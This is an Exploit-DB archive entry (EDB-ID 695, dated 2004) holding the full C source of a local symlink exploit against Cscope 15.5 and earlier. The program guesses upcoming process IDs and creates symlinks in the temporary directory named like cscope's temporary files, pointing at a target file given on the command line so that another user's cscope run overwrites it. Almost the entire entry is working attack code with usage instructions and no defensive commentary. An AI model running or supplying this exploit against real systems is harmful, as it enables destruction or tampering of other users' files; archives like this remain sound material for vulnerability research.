Cscope <= 15.5 Symlink Vulnerability Exploit

2004-12-17T00:00:00
ID EDB-ID:695
Type exploitdb
Reporter Gangstuck
Modified 2004-12-17T00:00:00

Description

Cscope <= 15.5 Symlink Vulnerability Exploit. Local exploit for linux platform

                                        
                                            /* RXcscope exploit version 15.5 and minor */
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;

#define BSIZE 64

int
main(int ac, char *av[]) {
        pid_t cur;
        u_int i=0, lst;
        char buffer[BSIZE + 1];
        
        fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\
                        " version 15.5 and minor \n" \
                        " Gangstuck / Psirac\n" \
                        " &lt;research@rexotec.com&gt;\n\n");
                        
        if (ac != 3) {
                fprintf(stderr, "Usage: %s &lt;target&gt; &lt;max file creation&gt;\n", av[0]);
                return 1;
        }
        
        cur=getpid();
        lst=cur+atoi(av[2]);
        
        fprintf(stdout, " -&gt; Current process id is ..... [%5d]\n" \
                        " -&gt; Last process id is ........ [%5d]\n", cur, lst);
        
        while (++cur != lst) {
                snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i);
                symlink(av[1], buffer);
        }

        return 0;
}

// milw0rm.com [2004-12-17]